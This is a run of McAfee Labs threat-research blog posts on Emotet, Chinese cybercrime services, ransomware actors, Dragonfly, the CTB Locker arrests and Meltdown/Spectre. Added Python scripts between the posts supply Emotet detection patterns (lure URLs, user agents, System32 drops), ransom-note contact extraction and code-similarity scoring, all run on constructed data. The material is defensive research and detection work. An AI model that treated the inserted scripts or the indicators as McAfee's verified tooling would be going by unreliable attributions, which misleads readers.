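constructed. User agents are the four listed in the post.
"""
import re

EMOTET_USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; InfoPath.3)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)",
]


def _squash(s):
    """Compare user agents with all whitespace removed, so a log that keeps
    the spaces and one that stripped them both match the same entry."""
    return re.sub(r"\s+", "", s)


UA_SET = {_squash(ua) for ua in EMOTET_USER_AGENTS}

# Lure paths from the post, host left as a wildcard.
LURE_URL_RE = re.compile(
    r"//[^/]+/(?:DOC/Invoice|scan/New-invoice-\d+|LLC/New-invoice-\d+)/?$", re.I)

# Constructed proxy log format: <ts> <src_ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')

# Drop rule: a file created directly in System32 with a GUID or five-digit name.
SYSTEM32_RE = re.compile(r"^[a-z]:\\windows\\system32\\([^\\]+)$", re.I)
GUID_NAME_RE = re.compile(
    r"^\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?(\.\w+)?$", re.I)
FIVE_DIGIT_NAME_RE = re.compile(r"^\d{5}(\.\w+)?$")


def triage_proxy_log(lines):
    """Split hits into stage-1 lure downloads and stage-2 check-in POSTs.
    The user agents alone are also sent by ordinary Windows 7 hosts, so only
    the POST plus matching UA combination is treated as a check-in."""
    lures, checkins = [], []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, src, method, url, status, ua = m.groups()
        if method == "GET" and LURE_URL_RE.search(url):
            lures.append({"ts": ts, "src": src, "url": url})
        elif method == "POST" and _squash(ua) in UA_SET:
            checkins.append({"ts": ts, "src": src, "url": url, "ua": ua})
    return {"lures": lures, "checkins": checkins}


def suspicious_drops(paths):
    """Return new file paths that match the System32 drop pattern."""
    flagged = []
    for p in paths:
        m = SYSTEM32_RE.match(p)
        if m and (GUID_NAME_RE.match(m.group(1)) or FIVE_DIGIT_NAME_RE.match(m.group(1))):
            flagged.append(p)
    return flagged


SAMPLE_PROXY_LOG = [  # constructed for illustration
    '2017-12-06T10:01:02Z 10.0.0.5 GET http://example.test/scan/New-invoice-41234/ 200 '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"',
    '2017-12-06T10:01:40Z 10.0.0.5 POST http://203.0.113.9/ 200 '
    '"Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.1;Trident/4.0;SLCC2;.NETCLR2.0.50727;'
    '.NETCLR3.5.30729;.NETCLR3.0.30729;MediaCenterPC6.0;.NET4.0C;.NET4.0E)"',
    '2017-12-06T10:02:11Z 10.0.0.7 GET http://intranet.test/ 200 '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0"',
    '2017-12-06T10:03:00Z 10.0.0.7 POST http://198.51.100.23:8080/ 200 '
    '"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)"',
]

SAMPLE_NEW_FILES = [  # constructed for illustration
    r"C:\Windows\System32\{9c1e5b2a-3f4d-4a6b-8c7d-0e1f2a3b4c5d}.exe",
    r"C:\Windows\System32\48213.exe",
    r"C:\Windows\System32\drivers\etc\hosts",
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Users\alice\AppData\Local\Temp\12345.exe",
]

if __name__ == "__main__":
    print(triage_proxy_log(SAMPLE_PROXY_LOG))
    print(suspicious_drops(SAMPLE_NEW_FILES))
```

Treat a check-in hit as a pivot rather than a verdict and corroborate it with a preceding lure download from the same host or a matching System32 write. The third user agent is worth noting on its own: rv:39.0 paired with Firefox/38.0 is an inconsistency a real browser does not produce.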

The control servers and URLs hosting the malicious documents are covered within McAfee Global Threat Intelligence, with which we provide coverage for the samples detected. The McAfee Advanced Threat Research team proactively monitors any new developments regarding Emotet.

Detection

The new variants of Emotet are detected by McAfee DAT files as Emotet-FEJ!<Partial Hash> since December 3. Real Protection technology within McAfee Endpoint Security Adaptive Threat Protection provides zero-day detection of these new variants as Real Protect-SS!<Partial Hash>.

The post Emotet Downloader Trojan Returns in Force appeared first on McAfee Blogs.

Chinese Cybercriminals Develop Lucrative Hacking Services

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

Operating Structure

The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Unlike their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that an increasing number of organized crime groups take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.

 

Master-Apprentice Mechanism

Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

Training program offered by an underground hacker.

Products

The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

  • DDoS services
  • Black-hat training
  • Malware sales
  • Advanced persistent attack services
  • Exploit toolkits sales
  • Source-code writing services
  • Website hacking services
  • Spam and flooding services
  • Traffic sales
  • Phishing website sales
  • Database hacking services

Buying Hacking Services and Malware

Some hacking groups provide 24/7 technical support and customer service for customers who lack a technical background. A hacking demonstration is also available on request, and prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay, but they are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire requests the remaining balance.

Steps in the hacking service transaction process:

  • Negotiating price
  • Making a deposit
  • Demonstration (if requested)
  • Beginning the hacking services
  • Paying the balance

Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

Steps in the malware purchase transaction process:

  • Negotiating price
  • Paying in full for malware
  • Receiving product or exploit kit

Conclusion

The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.

 

Follow all our research and stories like these on Twitter at @McAfee_Labs.

The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.


McAfee Labs Reports All-Time Highs for Malware in Latest Count

In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second?

One major trend that continued in Q3 is the abuse of Microsoft Office–related exploits and of malicious macro code that launches PowerShell to run the payload, the so-called fileless attack.

In March, an exploit was released that took advantage of CVE-2017-0199, a vulnerability in how Microsoft Office and WordPad handle specially crafted files that could result in remote code execution. During Q3, we saw an increase in the number of crafted files that were submitted. We also noticed that many releases take advantage of a toolkit on GitHub that makes it quite easy to create a “backdoor” attack:

Another major event in Q3 was a massive spam campaign to distribute a new version of the infamous Locky ransomware “Lukitus.” Within 24 hours, more than 23 million emails were sent. Shortly after the first arrived, security company Comodo Labs discovered another campaign related to this attack that sent more than 62,000 spam emails distributing the ransomware.

With banking Trojans, we observed the greatest activity from the Trickbot Trojan. We saw several variations in which the actors added new features to their code, for example, cryptocurrency stealing, embedding the EternalBlue exploit, and employing different ways of delivering the malware, which primarily targets the financial sector.

Another banking Trojan family that appeared often during the quarter was Emotet. In several spamming campaigns users were asked to download a Microsoft Word document from several locations. From our analysis of the attached document, we found the payload was hidden in the macros that used PowerShell to install the Trojan.

These major campaigns and others caused a tsunami of spam email, distributing a tremendous number of samples that increased the malware storage demands of all of us in the security industry.

For more details and our usual statistics on malware, breach incidents, and web and network threats, read the McAfee Labs Threats Report, December 2017.

The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

Looking Into the World of Ransomware Actors Reveals Some Surprises

During the preparations for our keynotes at McAfee’s recent MPOWER conference, we brainstormed a few topics we wanted to share with the audience. Ransomware was definitely on our agenda, but so much has already been said and written on the subject. What could we add that would be interesting?

We hit on the angle: to dive into this shady world and learn about the people behind these campaigns. There are several ways to approach this. We could go into forums and look for the individuals who discuss these campaigns or offer ransomware for sale. But that would be very time consuming and the chance of finding the right individuals would be small. There is a better way.

In most ransomware samples, once the malware executes and files are encrypted, the “ransom note” appears, either as a desktop background or as a text file containing the details. During 2017 we saw many of these notes contain an email address for questions, for payment details, and for the release of files.

Example:

We looked at three months of unique ransomware samples and extracted either the images or the notes that contained the contact addresses. As new ransomware families popped up in our tracker, we verified them and added the addresses—because these fresh attacks made it likely the authors would interact with us.
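Extracting the contact addresses from three months of notes is a small parsing job that repays care: actors obfuscate addresses to defeat scrapers, and the same address reappearing across families is itself a finding. The script below is an added example of that extraction and is not the research team's tooling; the notes are constructed, the obfuscation forms handled are the common "(at)" and "[dot]" variants, and the sample hashes are placeholders.

```python
"""Pull contact and payment identifiers out of ransom notes and index
samples by the addresses they share.

Added example; not McAfee's tooling. Notes and hashes are constructed.
"""
import re
from collections import defaultdict

# Actors often write "name (at) domain [dot] com" to dodge naive scrapers.
DEOBFUSCATE = [
    (re.compile(r"\s*[\(\[\{]\s*at\s*[\)\]\}]\s*", re.I), "@"),
    (re.compile(r"\s*[\(\[\{]\s*dot\s*[\)\]\}]\s*", re.I), "."),
]
EMAIL_RE = re.compile(r"\b[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}\b", re.I)
ONION_RE = re.compile(r"\b[a-z2-7]{16}(?:[a-z2-7]{40})?\.onion\b", re.I)
# Base58 shape of a legacy Bitcoin address; no checksum validation here.
BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")


def normalise(text):
    for rx, rep in DEOBFUSCATE:
        text = rx.sub(rep, text)
    return text


def extract_contacts(note):
    """Return de-duplicated, case-folded contact identifiers from one note."""
    text = normalise(note)
    return {
        "emails": sorted({m.lower() for m in EMAIL_RE.findall(text)}),
        "onion": sorted({m.lower() for m in ONION_RE.findall(text)}),
        "btc": sorted(set(BTC_RE.findall(text))),
    }


def index_by_contact(samples):
    """Map each email address to the sample hashes whose notes mention it,
    so a new family that reuses an address surfaces immediately."""
    idx = defaultdict(set)
    for sha, note in samples.items():
        for email in extract_contacts(note)["emails"]:
            idx[email].add(sha)
    return {email: sorted(shas) for email, shas in idx.items()}


SAMPLE_NOTES = {  # constructed; keys stand in for sample SHA-256 values
    "a1" * 32: "Your files are encrypted! Write to restore_help@example.com\n"
               "or backup_help(at)example[dot]org. Pay 0.5 BTC to "
               "1ExampLeAddrEsS4RanSomNoTe7yQ9KpVz",
    "b2" * 32: "ALL YOUR DATA LOCKED. contact: RESTORE_HELP@EXAMPLE.COM within 72h",
    "c3" * 32: "Decrypt at http://abcdefghijklmnop.onion/ - id 9f3c",
}

if __name__ == "__main__":
    for sha, note in SAMPLE_NOTES.items():
        print(sha[:12], extract_contacts(note))
    print(index_by_contact(SAMPLE_NOTES))
```

Before any outreach, check that each extracted domain actually resolves and accepts mail; as the post goes on to describe, a sizeable share of the addresses in real notes are fake or dead, and those are worth recording as a finding rather than discarding.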

But how could we convince the actors to answer our questions? We took the role of students working on a master’s thesis and asked the actors if they would be willing to answer a few questions. For a couple of weeks we lived the role of students, eating lots of pizza, drinking sodas, and so on. (You have to live the role, right?)

We sent our emails and queried the actors who responded. One of our first observations was that of all the emails we retrieved, about 30 percent were either fake or nonexistent. So in these cases when files were encrypted and the victim decided to pay, using email to send evidence of payment was useless. The money was gone (as well as the files).

During the first week of our research we received answers back from some of the actors, but most were not willing to cooperate. That’s no surprise: They were cautious about revealing their identity.

During the second week, we had better luck and started to chat with a few. That number grew, and after a few weeks we had a great collection of conversations with the actors.

“Fast, easy, and safe”

When we asked why they started a career in ransomware, most answered with variations on “enough money” and “fast, easy, and safe,” especially when using anonymous email services and cryptocurrency for payments.

Homemade vs. Off the Shelf

Most of the actors we spoke with wrote their own ransomware. They had looked at the published source code but were clever enough to come up with their own variants that contained new techniques or different approaches to keep detections low. The longer they stayed out of sight of endpoint security solutions, the longer was their opportunity to make money.

Spending Their Ill-Gotten Gains

They spend the revenue they gained from their campaigns in various manners: travel, cars. One had many affiliates working for him so he was soon going to buy a house. One of the most surprising answers was that one turned to ransomware to “pay off his debts.”

Willing to Negotiate

Although they often have the image of being ruthless, almost all of them claimed a willingness to negotiate the ransom price in case victims could not afford to pay the demanded amount.

Tracking the Authors

One of the actors was so enthusiastic he wanted to sell us ransomware code so we could pay off our college debts. Based on his answers and the information he shared, we noticed that he was not a very experienced actor, and he gave clues to his whereabouts. In one of the conversations he shared some examples, but the data was not scrubbed. By correlating the data he provided with other information, such as email time zones and mistakes in his English, we traced him to Dakar, Senegal. He not only sends ransomware but also sells botnets and other fraud-related services.

We found the research eye opening. Now we just need a few weeks in the gym to work off all the sodas and pizzas.

For those suffering from a ransomware attack, you have three options. The first two are bad: lose your files, or pay the ransom and hope (with no guarantee) for a key to unlock your files. The best option is to start with a visit to NoMoreRansom.org to see if a decryption tool is available.

Meanwhile, remember the standard advice on reducing your risk of picking up ransomware: Keep your OS, security, and application software up to date; exercise a healthy dose of skepticism even when you see messages that appear to come from legitimate sources; and do not click on links or open files from unknown names or organizations.

 

Learn more about the threat statistics we gathered in Q3, including ransomware in the McAfee Labs Threats Report, December 2017 and follow the team on Twitter at @McAfee_Labs.

The post Looking Into the World of Ransomware Actors Reveals Some Surprises appeared first on McAfee Blogs.

Operation Dragonfly Analysis Suggests Links to Earlier Attacks

On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014.

Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any further information regarding the source and possible motivations of those behind the campaign. The campaign targets energy companies around the world by leveraging spear-phishing emails that, once successful, allow the attackers to download Trojan software. The Trojans provide access to the victims’ systems and networks.

Going Beyond Energy

Although initial reports showed Dragonfly attacks targeting the energy sector, investigations by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries. Everything about this campaign points to a well-prepared assault that carefully considers each target, and conducts reconnaissance before taking any measures to exploit compromised targets.

We saw the group use several techniques to get a foothold in victims’ networks, including spear phishing, watering holes, and, in previous campaigns, compromises of supply-chain software. By breaking into a well-established software vendor and embedding “backdoor” malware in its products, the attackers let victims believe they are installing software from a trusted vendor while they remain unaware of the supply-side compromise.

Once the attackers have a foothold, they create or gain user accounts to operate stealthily. Using the remote-desktop protocol to hop among internal or external systems, they connect either to a control server if the risk is minimal or use an internal compromised server to conduct operations.

The last wave of attacks used several backdoors and utilities. In analyzing the samples, we compared these with McAfee’s threat intelligence knowledge base of attack artifacts.

One of the starting points was a Trojan in the 2017 campaign with the following hashes:

  • MD5: da9d8c78efe0c6c8be70e6b857400fb1
  • SHA-256: fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9

Comparing this code, we discovered another sample from the group that was used in a July 2013 attack:

  • MD5: 4bfdda1a5f21d56afdc2060b9ce5a170
  • SHA-256: 07bd08b07de611b2940e886f453872aa8d9b01f9d3c61d872d6cfe8cde3b50d4
  • Filename: fl.exe

The file was downloaded after a Java exploit executed on the victim’s machine, according to the 2013 attack report. After analyzing the 2013 sample, we noticed that some of the executable’s resources were in Russian.

Comparing the code, we find the 2017 sample has a large percentage of the same code as the backdoor used in the 2013 attacks. Further, some code in the 2017 backdoor is identical to code in the application TeamViewer, a legitimate remote administration tool used by many around the world. By incorporating the code and in-memory execution, the attackers avoid detection and leave no trace on disk.

The correlating hash we discovered that contained the same TeamViewer code was reported by CrySyS, a Hungarian security lab. In their report on “TeamSpy,” they mention the hash we correlated as well: 708ceccae2c27e32637fd29451aef4a5. This particular sample had the following compile date: 2011:09:07 – 09:27:58+01:00

The TeamSpy attacks were originally aimed at political and human rights activists living in the Commonwealth of Independent States (the former Soviet Union) and eastern European countries. Although the report attributes the attacks to a threat actor or actors with shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. With identical code reuse, could the TeamSpy campaign be the work of Dragonfly?

But that’s not all of interest. We also discovered that the 2017 sample contained code blocks associated with another interesting malware family: BlackEnergy. Let’s look at an example of the code similarities we discovered:

A BlackEnergy sample from 2016 (at left) alongside a Dragonfly sample from 2017.

Self-deleting code is very common in malware, but it is usually implemented by creating a batch file and executing the batch instead of directly calling the delete command, as we see in the preceding examples.

The BlackEnergy sample used in our comparison was captured in Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, which suggests a correlation between the BlackEnergy and Dragonfly campaigns.
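The correlation above rests on finding a block of code that two binaries share verbatim. The script below is an added example of how such shared blocks are located and scored, and is not McAfee's or Intezer's tooling: production comparisons work on disassembled basic blocks with immediates and addresses masked, whereas this reduces the idea to raw byte n-grams, which is enough to find a copied block. Both "samples" are constructed byte strings, not the hashes listed in the post, and the embedded "stub" is arbitrary bytes standing in for a shared routine.

```python
"""Locate and score code blocks shared between two samples using byte
n-grams.

Added example; not McAfee's or Intezer's tooling. Samples are constructed.
"""

N = 8  # n-gram width in bytes; wider means fewer chance matches


def ngram_set(data: bytes, n: int = N):
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def shared_block_ratio(a: bytes, b: bytes, n: int = N) -> float:
    """Fraction of a's distinct n-grams that also occur in b. Directional:
    a small backdoor embedded in a larger binary scores high when a is the
    small one, and low the other way round."""
    ga = ngram_set(a, n)
    return len(ga & ngram_set(b, n)) / len(ga) if ga else 0.0


def shared_runs(a: bytes, b: bytes, n: int = N, min_len: int = 16):
    """(offset, length) of each run in a of consecutive n-grams that all
    occur in b, at least min_len bytes long. These are the places to open
    in a disassembler to confirm a copied block. An estimate only:
    consecutive grams of a need not be adjacent in b."""
    gb = ngram_set(b, n)
    runs, start = [], None
    for i in range(len(a) - n + 2):  # one past the end flushes the last run
        hit = i < len(a) - n + 1 and a[i:i + n] in gb
        if hit and start is None:
            start = i
        elif not hit and start is not None:
            length = (i - start) + n - 1
            if length >= min_len:
                runs.append((start, length))
            start = None
    return runs


def longest_shared_run(a: bytes, b: bytes, n: int = N) -> int:
    return max((length for _, length in shared_runs(a, b, n, min_len=n)), default=0)


# Constructed material: a 35-byte "stub" shared by two otherwise unrelated
# byte sequences, plus a third sequence that shares nothing.
SHARED_STUB = bytes.fromhex(
    "4883ec28488d0d00000000ff15000000004885c0740b488d0d00000000ff1500000000")
FILLER_ASC = bytes(range(256)) * 2
FILLER_DESC = bytes(range(255, -1, -1)) * 2
SAMPLE_OLD = FILLER_ASC + SHARED_STUB + FILLER_ASC[::3]
SAMPLE_NEW = FILLER_DESC + SHARED_STUB + FILLER_DESC[:100]
SAMPLE_UNRELATED = bytes((i * 7 + 3) % 256 for i in range(600))


def report(a: bytes, b: bytes) -> dict:
    """Summary an analyst can act on: overall overlap plus the concrete
    offsets of the largest shared block."""
    return {
        "ratio": round(shared_block_ratio(a, b), 3),
        "runs": shared_runs(a, b),
        "longest": longest_shared_run(a, b),
    }


if __name__ == "__main__":
    print("new vs old:", report(SAMPLE_NEW, SAMPLE_OLD))
    print("new vs unrelated:", report(SAMPLE_NEW, SAMPLE_UNRELATED))
    print("stub vs old:", report(SHARED_STUB, SAMPLE_OLD))
```

A low overall ratio with one long run, as between the two constructed samples here, is exactly the signature the post describes: two mostly different binaries that carry one identical routine. A high ratio in one direction only indicates that one sample is largely contained in the other, which is what to expect when a backdoor reuses a whole earlier codebase.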

Actor Sophistication

Our analysis of this attack tells a story about the actors’ capability and skills. Their attack precision is very good; they know whom and what to attack, using a variety of methods. Their focus is on Windows systems and they use well-known practices to gather information and credentials. From our research, we have seen the evolution of the code in their backdoors and the reuse of code across their campaigns.

How well do the actors cover their tracks? We conclude they are fairly sophisticated in hiding details of their attacks, and in some cases in leaving details behind to either mislead or make a statement. We rate threat actors by scoring them in different categories; we have mentioned a few. The Dragonfly group is in the top echelon of targeted attackers; it is critical that those in the targeted sectors be aware of them.

The Dragonfly group is most likely after intellectual property or insights into the sector they target, with the ability to take offensive disruptive and destructive action, as was reported in the 2015 attack on the Ukrainian power grid by a BlackEnergy malware family.


We would like to thank the team at Intezer for their assistance and support during our research.

The post Operation Dragonfly Analysis Suggests Links to Earlier Attacks appeared first on McAfee Blogs.

McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker


In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

Today, with the arrest of individuals suspected of infecting computer systems by spreading the CTB Locker malware, a clear message has been sent—involvement in cybercrime is not zero-risk.

CTB Locker

CTB Locker, also known as Critroni, is one of the largest ransomware families. It helped drive a ransomware surge of 165 percent in 2015 as one of the top three families that year, and earned the No. 1 spot a year later. Operation Tovar, in which law enforcement agencies took down the infrastructure responsible for spreading CryptoLocker, created a need for more malware—the CTB Locker and CryptoWall families helped to fill the gap.

In June 2014, the CTB Locker authors began to advertise the malware family on the underground scene at a cost of $3,000USD, where people could buy the first versions for $1,500USD. The authors also offered an affiliate program, which made CTB Locker infamous. By sharing a percentage of the received ransoms, the affiliates ran the greater risk—because they had to spread the ransomware—but they also enjoyed the higher profits. By using exploit kits and spam campaigns, the malware was distributed all over the world, mostly targeting “Tier 1” countries, those in which the victims could afford to pay and most likely would pay the ransom. Midway through 2015, we gained unique information from an affiliate server that helped us tremendously in the subsequent investigations.

A CTB Locker affiliate server.
An example of CTB Locker source code.

Besides the use of an affiliate server in CTB Locker’s infrastructure, two other components complete the setup: a gateway server and a payment server.

Attacks Begin to Grow

During 2016, a massive spam campaign struck the Netherlands. Emails in Dutch appeared to originate from one of the country’s largest telco providers and claimed to have the latest bill attached. There was no bill, of course; instead, CTB Locker demanded a ransom of around $400USD to return the victim’s files. The grammar and word usage were near perfect—not what we commonly observe—and the names used in the emails were proof of a well-prepared campaign. More than 200 cases were filed in the Netherlands alone in relation to these infections.

With attacks growing in number, the Dutch High Tech Crime Unit began an investigation. The unit approached McAfee’s Advanced Threat Research team to assist in identifying samples and answering questions.

Following our research, we were kept updated and were informed that operation “Bakovia” started in the early morning of December 14. The initial research focused on the CTB Locker ransomware, but based on information from the U.S. Secret Service it was determined that the same suspected gang was also linked to the distribution of Cerber ransomware—another major family.

The Arrests

During the operation in eastern Romania, six houses were searched, and investigators seized a significant number of hard drives, laptops, external storage devices, cryptocurrency mining rigs, and hundreds of SIM cards. Suspects were arrested for allegedly spreading CTB Locker ransomware, and other suspects allegedly responsible for spreading Cerber were arrested at the airport in Bucharest.

Watch video of arrests. 

The law enforcement action emphasizes the value of public-private partnerships and underscores the determination behind the McAfee mantra “Together is power.”

The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

Decyphering the Noise Around ‘Meltdown’ and ‘Spectre’


The McAfee Advanced Threat Research (ATR) Team has closely followed the attack techniques that have been named Meltdown and Spectre throughout the lead-up to their announcement on January 3. In this post, McAfee ATR offers a simple and concise overview of these issues, to separate fact from fiction, and to provide insight into McAfee’s capabilities and approach to detection and prevention.

There has been considerable speculation in the press and on social media about the impact of these two new techniques, including which processors and operating systems are affected. The speculation has been based upon published changes to the Linux kernel. McAfee ATR did not want to add to any confusion until we could provide our customers and the general public solid technical analysis.

A fully comprehensive writeup comes from Google Project Zero in this informative technical blog, which allowed ATR to validate our conclusions. For more on McAfee product compatibility, see this business Knowledge Center article and this Consumer Support article.

The Techniques

Meltdown and Spectre are new techniques that build upon previous work, such as “KASLR”  and other papers that discuss practical side-channel attacks. The current disclosures build upon such side-channel attacks through the innovative use of speculative execution.

Speculative execution has been a feature of processors for at least a decade. Branch speculation is built on the Tomasulo algorithm. In essence, when a branch in execution depends upon a runtime condition, modern processors make a “guess” to potentially save time. This speculatively executed branch proceeds by employing a guess of the value of the condition upon which the branch must depend. That guess is typically based upon the last step of the same branch’s previous execution. The conditional value is cached for reuse in case that particular branch is taken again. There is no loss of computing time if the condition arrives at a new value because the processor must in any event wait for the value’s computation. Invalid speculative executions are thrown away. The fact that invalid speculations are tossed is a key attribute exploited by Meltdown and Spectre.

Despite the clearing of invalid speculative execution results without affecting memory or CPU registers, data from the execution may be retained in the processor caches. The retaining of invalid execution data is one of the properties of modern CPUs upon which Meltdown and Spectre depend. More information about the techniques is available on the site https://meltdownattack.com.

Because these techniques can be applied (with variation) to most modern operating systems (Windows, Linux, Android, iOS, MacOS, FreeBSD, etc.), you may ask, “How dangerous are these?” “What steps should an organization take?” and “How about individuals?” The following risk analysis is based upon what McAfee currently understands about Meltdown and Spectre.

There is already considerable activity in the security research community on these techniques. Sample code for two of the three variants was posted by Graz University (in an appendix of the Spectre paper). Erik Bosman has also tweeted that he has built an exploit, though this code is not yet public. An earlier example of side-channel exploitation based upon memory caches was posted to GitHub in 2016 by Meltdown-Spectre researcher Daniel Gruss. Despite these details, as of this writing no known exploits have yet been seen in the wild. McAfee ATR will continue to monitor researchers’ and attackers’ interest in these techniques and provide updates accordingly. Given the attack surface of nearly every modern computing system and the relative ease of exploitation, it is highly likely that at least one of the aforementioned variants will be weaponized very quickly.

McAfee researchers quickly compiled the public exploit code for Spectre and confirmed its efficacy across a number of operating systems, including Windows, Linux, and MacOS.

Weaponization

To assess the potential impact of any vulnerability or attack technique, we must first consider its value to attackers. These exploits are uniquely attractive to malicious groups or persons because the attack surface is nearly unprecedented, the attack vector is relatively new, and the impacts (privilege escalation and leaks of highly sensitive memory) are detrimental. The only naturally mitigating factor is that these exploits require local code execution. A number of third parties have already identified JavaScript as an applicable delivery point, meaning both attacks could theoretically be run from inside a browser, effectively opening an avenue of remote delivery. As always, JavaScript is a double-edged sword, offering a more user-friendly browsing experience, but also offering attackers an increased attack surface in the context of the browser’s executing scripted code.

Any technique that allows an attacker to cross virtual machine boundaries is of particular interest, because such a technique might allow an adversary to use a cloud virtual machine instance to attack other tenants of the cloud. Spectre is designed to foster attacks across application boundaries and hence applies directly to this problem. Thus, major cloud vendors have rushed to issue patches and software updates in advance of the public disclosure of these issues.

Additionally, both Meltdown and Spectre are exceptionally hard to detect as they do not leave forensic traces or halt program execution. This makes post-infection investigations and attack attribution much more complex.

Recommendations

